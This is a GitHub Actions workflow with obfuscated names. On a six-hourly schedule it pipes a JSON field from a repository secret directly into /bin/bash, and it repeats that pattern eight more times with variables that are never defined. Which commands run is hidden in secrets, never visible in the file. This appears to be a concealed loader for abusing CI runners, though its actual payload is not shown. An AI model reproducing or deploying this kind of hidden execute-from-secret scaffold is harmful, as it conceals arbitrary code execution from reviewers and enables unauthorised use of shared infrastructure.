name: lanjingtian5614

on:
  workflow_dispatch:
  schedule:
    - cron: '14 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lanjingtian5614
        env:
          tf95: ${{ secrets.tf95 }}
        run: |
          echo $tf95 | jq -r .s5 | /bin/bash
          echo $gk8 | jq -r .px2 | /bin/bash
          echo $m55950 | jq -r .hyhaw741 | /bin/bash
          echo $ppan12 | jq -r .cxag0067 | /bin/bash
          echo $a369 | jq -r .n7 | /bin/bash
          echo $viv57209 | jq -r .noykc5 | /bin/bash
          echo $xjlzd086 | jq -r .kcxqk0100 | /bin/bash
          echo $vrho42915 | jq -r .jxl2 | /bin/bash
          echo $f2731 | jq -r .ef9646 | /bin/bash

